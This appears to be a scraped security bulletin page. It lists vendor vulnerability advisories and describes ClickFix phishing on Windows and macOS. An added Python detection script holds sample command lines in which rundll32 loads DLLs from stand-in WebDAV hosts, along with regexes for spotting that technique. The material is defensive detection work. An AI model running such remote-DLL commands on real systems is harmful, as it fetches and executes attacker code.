Android Denial of Service Vulnerability
RISK: Medium Risk
TYPE: Operating Systems - Mobile & Apps
A vulnerability was identified in Android. A remote attacker could exploit this vulnerability to trigger a denial of service condition on the targeted system.
Impact
- Denial of Service
System / Technologies affected
- Android security patch levels before 2026-04-01
Solutions
Before installation of the software, please visit the vendor web-site for more details.
RISK: Medium Risk
TYPE: Clients - Browsers
Multiple vulnerabilities were identified in Mozilla products. A remote attacker could exploit some of these vulnerabilities to trigger a denial of service condition and remote code execution on the targeted system.
Versions prior to:
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: Extremely High Risk
TYPE: Operating Systems - Networks OS
A vulnerability has been identified in Fortinet FortiClientEMS. A remote attacker could exploit this vulnerability to trigger remote code execution and elevation of privilege on the targeted system.
Note:
CVE-2026-35616 is being exploited in the wild. An Improper Access Control vulnerability in FortiClient EMS may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.
Before installation of the software, please visit the vendor web-site for more details.
RISK: High Risk
TYPE: Operating Systems - Linux
Multiple vulnerabilities were identified in SUSE Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and security restriction bypass on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: High Risk
TYPE: Clients - Browsers
Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, denial of service condition, security restriction bypass, data manipulation and sensitive information disclosure on the targeted system.
Note:
CVE-2026-5281 is being exploited in the wild. The vulnerability allows a remote attacker who has compromised the renderer process to execute arbitrary code via a crafted HTML page. Hence, the risk level is rated as High Risk.
Before installation of the software, please visit the software vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: Medium Risk
TYPE: Operating Systems - Linux
Multiple vulnerabilities were identified in Red Hat Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger data manipulation, denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: Medium Risk
TYPE: Operating Systems - Networks OS
Multiple vulnerabilities were identified in Citrix Products. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition and sensitive information disclosure on the targeted system.
Note:
CVE-2026-3055 is being exploited in the wild. The vulnerability is caused by insufficient input validation leading to memory overread. Citrix ADC or Citrix Gateway must be configured as a SAML IDP to be vulnerable. Hence, the risk level is rated as Medium Risk.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
Type: Phishing
Recent threat intelligence indicates that ClickFix tactics, originally targeting Microsoft Windows, have now evolved with a new variant aimed at macOS. This expansion demonstrates that the technique is increasingly being deployed by multiple attackers.
Traditional Windows-focused ClickFix attacks
These campaigns mimic the familiar “Verify You are a Human” tests commonly used by websites to distinguish legitimate users from bots. Victims are prompted to press specific keyboard combinations, which ultimately result in the download and execution of malicious software on Microsoft Windows systems.
The deceptive process typically unfolds as follows:
Latest Windows Variant – Abusing Windows components Rundll32 & WebDAV
The most recent ClickFix variant abuses two legitimate Windows components, rundll32.exe and WebDAV, to deliver payloads. It loads remote DLLs via ordinal calls to evade detection, reducing reliance on script engines and bypassing traditional monitoring. This shift to native Windows components, combined with anti-analysis techniques, makes the attack stealthier and harder to detect.
(ClickFix attack targeting Windows users)
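A detection check for the pattern described above, added here as an example and not taken from the original advisory or from any vendor tooling: it rates process-creation command lines by whether rundll32 loads a DLL from a WebDAV path and selects the export by ordinal. The command-line shapes, function names, hostnames and sample events are constructed assumptions, since the advisory does not show the actual commands.

```python
import re

# rundll32 invocation and everything after it (the DLL path and export)
RUNDLL32 = re.compile(r'(?i)(?:^|[\\"\s])rundll32(?:\.exe)?"?\s+(?P<args>.+)$')
# UNC path; the Windows WebDAV redirector form adds "@SSL" and/or "@<port>"
# after the host, or uses the DavWWWRoot pseudo-share
UNC = re.compile(r'(?i)\\\\(?P<host>[^\\@\s"]+)(?P<dav>(?:@ssl)?(?:@\d+)?)\\(?P<rest>[^\s",]*)')
# export selected by ordinal (",#<n>") instead of by name
ORDINAL = re.compile(r',\s*#\d+\b')

def findings(cmdline):
    """Return the traits of one process command line, in a fixed order."""
    m = RUNDLL32.search(cmdline)
    if not m:
        return []
    args, out = m.group("args"), []
    unc = UNC.search(args)
    if unc:
        out.append("remote-dll")
        if unc.group("dav") or unc.group("rest").lower().startswith("davwwwroot"):
            out.append("webdav")
    if ORDINAL.search(args):
        out.append("ordinal-export")
    return out

def severity(cmdline):
    f = set(findings(cmdline))
    if {"webdav", "ordinal-export"} <= f:
        return "high"      # the combination the advisory describes
    if "remote-dll" in f:
        return "medium"    # DLL from a network share, worth a look
    return "low" if f else "none"

def triage(events):
    """Keep (host, severity, findings) for events rated medium or high."""
    rated = ((h, severity(c), findings(c)) for h, c in events)
    return [r for r in rated if r[1] in ("medium", "high")]

# Constructed process-creation records (hostname, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws-01", r'rundll32.exe \\cdn.example.test@SSL\DavWWWRoot\verify.dll,#1'),
    ("ws-02", r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl'),
    ("ws-03", r'rundll32 \\files.example.test@8080\share\update.dll,#3'),
    ("ws-04", r'rundll32.exe C:\Windows\System32\shell32.dll,#61'),
    ("ws-05", r'rundll32.exe \\fileserver\tools\helper.dll,Start'),
]

if __name__ == "__main__":
    for host, sev, why in triage(SAMPLE_EVENTS):
        print(host, sev, ",".join(why))
```

An ordinal export on a local system DLL (ws-04) rates only low, so the rule keys on the combination of remote WebDAV path and ordinal, not on either trait alone.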
macOS Variant – Infinity Stealer
A new macOS-targeted ClickFix variant delivers Infinity Stealer via fake Cloudflare CAPTCHA lures. Victims are tricked into pasting a malicious curl command into the macOS Terminal, installing a Python-based infostealer compiled with Nuitka for enhanced evasion.
Infinity Stealer can:
All stolen data is exfiltrated via HTTP POST requests to the C2 server, with a Telegram alert sent to attackers upon completion. This campaign highlights ClickFix’s expansion from Windows to macOS, employing more advanced and stealthy techniques.
(ClickFix attack targeting macOS users)
(Ref: https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/)
Recommendations
Organisations and individuals are urged to stay alert to evolving ClickFix phishing tactics, which now target both Windows and macOS systems, and take proactive measures to prevent compromise. To guard against related ClickFix attacks, please take the following measures:
RISK: Medium Risk
TYPE: Clients - Browsers
Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, denial of service condition and sensitive information disclosure on the targeted system.
Before installation of the software, please visit the software vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: Medium Risk
TYPE: Security software and application - Security Software & Appliance
Multiple vulnerabilities were identified in Cisco IOS XE. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition, remote code execution, security restriction bypass and elevation of privilege on the targeted system.
For affected devices, please refer to the link issued by the vendor:
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: Medium Risk
TYPE: Servers - Other Servers
Multiple vulnerabilities were identified in GitLab. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, spoofing, sensitive information disclosure, cross-site scripting, data manipulation and security restriction bypass on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
RISK: Medium Risk
TYPE: Servers - Internet App Servers
Multiple vulnerabilities were identified in IBM WebSphere Products. A remote attacker could exploit some of these vulnerabilities to trigger elevation of privilege, spoofing, sensitive information disclosure, data manipulation and security restriction bypass on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
Android Denial of Service Vulnerability Release Date: 2026-04-08 RISK: Medium Risk TYPE: Operating Systems - Mobile & Apps A vulnerability was identified in Android...